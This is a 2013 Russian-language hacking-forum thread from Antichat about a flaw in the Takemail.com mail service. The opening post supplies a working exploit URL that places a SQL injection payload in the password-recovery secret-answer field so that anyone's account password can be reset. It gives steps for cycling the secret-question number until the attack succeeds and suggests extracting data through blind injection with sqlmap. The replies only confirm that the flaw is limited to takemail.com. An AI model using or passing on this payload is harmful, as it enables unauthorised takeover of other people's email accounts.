Уязвимость в Takemail.com позволяющая сменить пароль на любой почте.

Discussion in 'Уязвимости Mail-сервисов' started by psihoz26, 8 Dec 2013.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.
    Code:
    http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[COLOR=DarkRed][B][ЛОГИН][/B][/COLOR]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[COLOR=DarkRed][B][НОВЫЙ ПАРОЛЬ][/B][/COLOR]&password2=[B][COLOR=DarkRed][НОВЫЙ ПАРОЛЬ][/COLOR][/B]
    Если вы увидите ошибку говорящую вам о том что не верен ответ на секретный вопрос то вам нужно поменять номер вопроса
    Для этого меняем mail_secretquestion=* в ссылке
    Всего их 8 (от 1 до 8)



    Как многие поняли тут ещё sql иньекция.
    Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\
     
    #1 psihoz26, 8 Dec 2013
    Last edited: 8 Dec 2013
    1 person likes this.
  2. Bremen

    Bremen New Member

    Joined:
    21 Sep 2012
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Сменить пароль на любой почте(майл, яндакс, гмайл и т.д.) или на любой учетке в почте takemail?
     
  3. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Интересно

    Нет только в takemail.com